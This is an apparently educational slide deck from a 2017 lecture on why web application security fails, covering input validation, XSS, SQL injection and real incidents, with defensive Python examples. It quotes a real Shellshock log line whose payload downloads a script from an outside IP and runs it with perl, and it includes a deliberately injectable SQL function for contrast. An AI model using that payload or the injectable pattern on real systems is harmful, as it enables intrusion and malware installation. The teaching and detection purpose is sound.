HOW AND WHY
WEB APP
SECURITY FAILS?
16.2. 2017 Tampere University of Technology
Antti.virtanen@solita.fi
Twitter: @Anakondantti
FOREWORD, 1 MINUTE
› Solita?
› Me?
› Web application?
• Much more important than you may realize..
AGENDA
› How to make secure software?
› … But, everything is broken!
› … Because ...
• Same mistakes are repeated.
• Unthinkable, Unpossible, Impossiblator happens
› Practical web application security testing.
› Bonus: 10. fail 20. goto 10
SECURITY IS RISK
MANAGEMENT
“If you know the enemy and know yourself, you need not fear the result of a hundred battles.”
Sun Tzu, Art of War
Source: Hackerman, Kung Fury movie
Source: NSA recruitment video.
Source: securityintelligence.com
Source: Lizard Squad hacking group logo
SOLITA #DEVSEC LANDSCAPE
GOOD NEWS:
SECURITY IS SIMPLE!
Bad news: Simple != easy
RECIPE FOR SECURE SOFTWARE
1. Design it properly. Do the right thing.
2. Do it right
   1. Mistake in implementation = bug = security issue
3. Prepare for the unthinkable
(Bug bounties etc. are useful too, but out of scope here.)
DO THE RIGHT THING
1. Don’t roll your own.
   1. Especially, don’t invent hash algorithms, RND or crypto!
   2. Seriously. Failure imminent and certain.
2. Follow best practices.
3. Understand what you are doing.
   1. Read the RFC. Understand your tools and libs.
SOMETHING UNTHINKABLE
It’s the same story every day..
UNTHINKABLE NAMES?
UNTHINKABLE DOMAINS AND DNS
RECORDS (PUNYCODE ATTACK)
A PICTURE IS WORTH 1000 WORDS
› Demo-time: SVG is a picture file, right?
› Feeling lucky, punk?
WHAT THE ACTUAL **** ??
INPUT SANITATION
= 80% WIN
THE SAME STORY ALL OVER!
› XSS, CSRF, SQL injection, XXE..
• Are all about input validation.
› Solution: white list allowed, deny everything else.
› There’s still 20% left
• You can fail session management certainly, but..
• Follow the advice: Don’t invent your own and you’ll be pretty safe.
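To make the allow-list rule concrete, here is an added example in Python (not from the slides or from Solita): each field is accepted only if it fully matches its own allow-list, unknown fields are dropped, free text that cannot be allow-listed is stored unchanged and encoded for the HTML context it is rendered into, and a strip-based deny-list is shown for contrast, because its output can still contain exactly what it tried to remove. Field names and rules are assumptions.

```python
import html
import re

# Allow-list per field (constructed example): a value is accepted only if it
# matches its rule completely; everything else is rejected, not "cleaned up".
ALLOW = {
    "username": re.compile(r"[a-z][a-z0-9_]{2,31}"),
    "page": re.compile(r"[1-9][0-9]{0,3}"),
    "sort": re.compile(r"name|date|size"),
}


class RejectedInput(ValueError):
    pass


def validate(form):
    """Return a dict with only the known fields, each checked against its allow-list."""
    clean = {}
    for field, rule in ALLOW.items():
        value = form.get(field, "")
        if not isinstance(value, str) or rule.fullmatch(value) is None:
            raise RejectedInput(f"{field}: {value!r} is not allowed")
        clean[field] = value
    return clean  # fields not in ALLOW are dropped, never passed through


def is_allowed(form):
    """Convenience wrapper: True if validate() accepts the form."""
    try:
        validate(form)
        return True
    except RejectedInput:
        return False


def denylist_strip(text):
    """Deny-list 'sanitation' for contrast: remove the things we happened to think of."""
    return text.replace("<script>", "").replace("</script>", "")


def render_comment(text):
    """Free text is stored as-is and encoded for the context it is rendered into (HTML body)."""
    return "<p>" + html.escape(text) + "</p>"
```

Note that denylist_strip("<scr<script>ipt>") returns "<script>": removing the inner match re-assembles the outer one, which is why the slide says to allow what is known and reject the rest.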
JAVASCRIPT
NECESSARY (?)
EVIL
JAVASCRIPT IS FULL OF EVIL
(GREPPING “EVIL” FROM JS SOURCES)
The most satisfying feeling you can get in the job is... The Pwn. Let's say you find SQL injection. Blood is rushing into your brain and that's what we call The Pwn. Your brain gets a really tight feeling, like your head is going to explode any minute.
Arnold “Iceman” Schwarzenegger, movie Pwningiron.
DEMO/PRACTICE
AGAINST GRUYERE
http://google-gruyere.appspot.com/
LET’S XSS !
› Reflected vs. Stored
› <script> doesn’t work?
• No problem, JS is everywhere..
› Can’t XMLHttpRequest?
• No prob, counter and fake
SQL INJECTION
› GRUYERE does not contain SQL injection..
› But .. It’s a good example of an injection
› SQL = Structured Query Language
• However, “query” is a bit of a misnomer..
What is this???
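An added example, not from the slides, of what “query” being a misnomer means in practice: with string concatenation the user's input is parsed as part of the SQL statement, so a quote character in the data rewrites the WHERE clause, whereas a bound parameter leaves the statement text fixed. The table and rows are constructed with Python's sqlite3 module.

```python
import sqlite3


def make_db():
    """Constructed in-memory table standing in for the application's real database."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, email TEXT, is_admin INTEGER)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("antti", "antti@example.test", 0),
        ("root", "root@example.test", 1),
    ])
    return con


def find_user_vulnerable(con, name):
    # 'Before' form: the data is pasted into the statement text, so the SQL
    # parser, not the developer, decides where the data ends and the code begins.
    sql = "SELECT name, email FROM users WHERE name = '" + name + "'"
    return con.execute(sql).fetchall()


def find_user_safe(con, name):
    # Parameterised form: the statement is fixed; the value is bound separately
    # and is compared as a plain string no matter which characters it contains.
    return con.execute(
        "SELECT name, email FROM users WHERE name = ?", (name,)
    ).fetchall()
```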
INPUT SANITATION,
STILL FAILING
LOGIC ATTACKS ARE DIFFICULT
› Real example..
REAL WORLD ATTACK
FROM A REAL ACCESS LOG
(CUSTOMER IP REDACTED)
› 2015-02-09:2015-02-09 09:17:01,420 INFO xxxx.infra.print-wrapper: Request 387280 start. host: xxx.xxx.xxx.xxx ,remote-addr: xx.xxx.xx.xxx ,method: GET ,uri: /cgi-bin/adm.cgi ,query-string: ,user-agent: () { :;}; /bin/bash -c "cd /var/tmp;wget http://151.236.44.210/efixx;curl -O http://151.236.44.210/efixx;perl efixx;perl /var/tmp/efixx;perl efixx" ,referer: ,oid:
Google tip: Shellshock
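Turning that log line into a detection, as an added example that is not from the slides: the parser below reads the ",key: value" field layout shown above, looks for the Bash function-definition marker that Shellshock relies on in the request fields an attacker controls, and pulls out the download URLs in the payload so they can be blocked and hunted for on hosts. The first sample line is the one on the slide; the second is a constructed benign request.

```python
import re

# Constructed sample log in the slide's access-log format: line 1 is the
# slide's own line, line 2 is a constructed ordinary browser request.
SAMPLE_LOG = """\
2015-02-09:2015-02-09 09:17:01,420 INFO xxxx.infra.print-wrapper: Request 387280 start. host: xxx.xxx.xxx.xxx ,remote-addr: xx.xxx.xx.xxx ,method: GET ,uri: /cgi-bin/adm.cgi ,query-string: ,user-agent: () { :;}; /bin/bash -c "cd /var/tmp;wget http://151.236.44.210/efixx;curl -O http://151.236.44.210/efixx;perl efixx;perl /var/tmp/efixx;perl efixx" ,referer: ,oid:
2015-02-09:2015-02-09 09:17:05,003 INFO xxxx.infra.print-wrapper: Request 387281 start. host: xxx.xxx.xxx.xxx ,remote-addr: xx.xxx.xx.xxx ,method: GET ,uri: /index.html ,query-string: ,user-agent: Mozilla/5.0 (X11; Linux x86_64) Firefox/45.0 ,referer: ,oid:
"""

FIELDS = ("host", "remote-addr", "method", "uri", "query-string",
          "user-agent", "referer", "oid")
# Fields are separated by " ," followed by a known key; splitting only on known
# keys keeps a " ," inside a value (e.g. a user-agent) from breaking the parse.
FIELD_SPLIT = re.compile(r" ,(?=(?:%s):)" % "|".join(re.escape(f) for f in FIELDS))
REQUEST_RE = re.compile(r"Request (\d+) start\. (.*)$")

# Shellshock marker: a Bash function definition "() {" in a header that a CGI
# script turns into an environment variable; vulnerable Bash ran what followed it.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")
URL_RE = re.compile(r"""https?://[^\s;"']+""")

# Request fields whose content comes straight from the client.
CLIENT_FIELDS = ("user-agent", "referer", "uri", "query-string")


def parse_request(line):
    """Split one log line into its request id and a dict of the ',key: value' fields."""
    m = REQUEST_RE.search(line)
    if m is None:
        return None, {}
    fields = {}
    for piece in FIELD_SPLIT.split(m.group(2)):
        key, _, value = piece.partition(":")
        fields[key.strip()] = value.strip()
    return m.group(1), fields


def scan_log(text):
    """Return one finding per request whose client-controlled fields carry the marker."""
    findings = []
    for line in text.splitlines():
        req_id, fields = parse_request(line)
        for name in CLIENT_FIELDS:
            value = fields.get(name, "")
            if SHELLSHOCK_RE.search(value):
                findings.append({
                    "request": req_id,
                    "remote-addr": fields.get("remote-addr"),
                    "uri": fields.get("uri"),
                    "field": name,
                    # download locations in the payload: candidates to block and hunt for
                    "urls": sorted(set(URL_RE.findall(value))),
                })
                break
    return findings
```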
WHAT THE ATTACKER WANTED?
efixx– first lines..
core – first lines..
DEV OR OPS? OR #DEVSEC ?
› Who is responsible for that server?
› Do you need to care as a developer?
› Ultimately: What is the developer’s responsibility?
SOME FAILS 2016-2017
Stories from the trenches
FAIL 1: THE BURDEN OF LEGACY
MD5 & C++ - “ELEGANT WEAPONS .. FOR A MORE CIVILIZED AGE”
› Native code is dangerous..
• ASLR & DEP make buffer overflows more difficult to exploit, but it still
happens.
› The lifespan of software can be surprisingly long..
• How to update and re-evaluate working software if nothing happens?
• Home-exercise: Sell this to team & customer. Involves risk and cost.
› New threats have emerged.
• What parts are affected?
Screenshot removed..
FAIL 2: SHORTCUTS AND ANARCHY
› Root cause: Heavy process, not understood / accepted by devs
• making developers miserable..
› The devs are innovative people..
http//unauthorized..
V 1.3 coolserver
AwesomeSoftware_Upgrade.exe
FAIL 3: “I ACCIDENTALLY”
STORY 4: THE WEBHACK EVENT
› http://webhack.fi was a light-weight fun bug bounty hunt..
• The targets are not publicly accessible, but were production systems we
created for our customers.
› Hackers hacked..
› .. SQL injection -> dumped the whole database
› .. But our code was fine! WAT?
ONE DOES NOT SIMPLY INJECT
INTO..
› One issue turned out to be a 0-day in Spring libraries..
› Hnggh..
› The moral of the story is two-fold:
1. even if you do everything right, you can still fail
2. it’s not always so easy in real life..
› The gory details: https://github.com/solita/sqli-poc
FURTHER MATERIAL
• From the internet:
• OWASP Top 10
• https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
• OWASP ZAP proxy
• https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
• Kali Linux
• https://www.kali.org/
Webapp security-tut-2017